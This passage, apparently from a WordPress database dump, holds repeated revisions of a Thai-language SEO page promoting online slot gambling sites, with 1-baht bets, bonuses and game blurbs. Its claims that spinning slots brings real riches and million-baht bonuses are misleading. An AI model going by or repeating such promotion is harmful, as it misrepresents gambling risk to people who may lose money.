จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:30','2026-02-26 19:10:30','',44,'https://amb18slot.com/?p=383',0,'revision','',0),(384,3,'2026-02-26 19:10:30','2026-02-26 19:10:30','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <strong>ปั่น สล็อต ฟรี ทดลอง</strong> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท','','inherit','closed','closed','','44-revision-v1','','','2026-02-26 19:10:30','2026-02-26 19:10:30','',44,'https://amb18slot.com/?p=384',0,'revision','',0),(385,3,'2026-02-26 19:15:06','2026-02-26 19:15:06','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>AMB18 เว็บยอดนิยม เว็บดังลิขสิทธิ์แท้ เล่นสบาย เริ่ม 1 บาท\n</h1> <p><a href=\"http://amb18slot.com\"><b>AMB18</b></a> เว็บยอดนิยมรวมความมันส์เป็นเว็บดังลิขสิทธิ์แท้ที่เล่นสบายทุกระบบรองรับสายทุนน้อย เริ่ม 1 บาท ครบทุกค่ายเกมดัง อัปเดตใหม่ตลอดเวลาที่นี่รวมทุกความบันเทิงไว้ครบในที่เดียวไม่ว่าจะเป็นสายหมุนสายทำกำไรหรือมือใหม่ที่เพิ่งเริ่มต้นก็สามารถเข้าถึงได้ง่าย ระบบถูกออกแบบมาให้ใช้งานสะดวกภาพลื่นไหลไม่มีสะดุด รองรับทั้งมือถือและคอมพิวเตอร์พร้อมมาตรฐานความปลอดภัยระดับสากล ทำให้ผู้เล่นมั่นใจได้ว่าเงินทุนและข้อมูลส่วนตัวได้รับการดูแลอย่างดี เมื่อรวมกับจุดเด่นเรื่องเริ่มต้นเพียง 1 บาท ยิ่งทำให้แพลตฟอร์มนี้กลายเป็นพื้นที่เล่นเกมที่เข้าถึงได้จริง</p> <h2>AMB18 สล็อต เว็บ ตรง แตก หนัก 2025 แหล่งรวมเกมอัปเดตเกมเยอะกว่า 1000 ห้องเกม\n</h2> <p>ความโดดเด่นของ <b>สล็อต เว็บ ตรง แตก หนัก 2025 </b>คือการเป็นศูนย์รวมเกมที่อัปเดตใหม่ตลอดทั้งปีภายในระบบมีเกมให้เลือกมากกว่า 1000 ห้องเกม ครอบคลุมทั้งสล็อตคลาสสิก วิดีโอสล็อต และเกมรูปแบบพิเศษที่มาพร้อมฟีเจอร์โบนัสจัดเต็ม ผู้เล่นสามารถเลือกแนวที่ชอบได้อย่างอิสระไม่ว่าจะเป็นธีมแฟนตาซี ผจญภัย หรือสไตล์คาวบอยสุดดุเดือด ทุกเกมถูกคัดสรรจากผู้ให้บริการชั้นนำที่มีใบอนุญาตถูกต้อง ทำให้มั่นใจได้ในมาตรฐานความยุติธรรม อีกทั้งระบบยังปรับปรุงความเร็วในการโหลดเกมให้เหมาะกับอินเทอร์เน็ตในประเทศไทย ช่วยให้ทุกการหมุนเป็นไปอย่างลื่นไหลเพิ่มโอกาสลุ้นรางวัลได้แบบเต็มอารมณ์</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ <strong>ปัน โปร สล็อต</strong> รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง 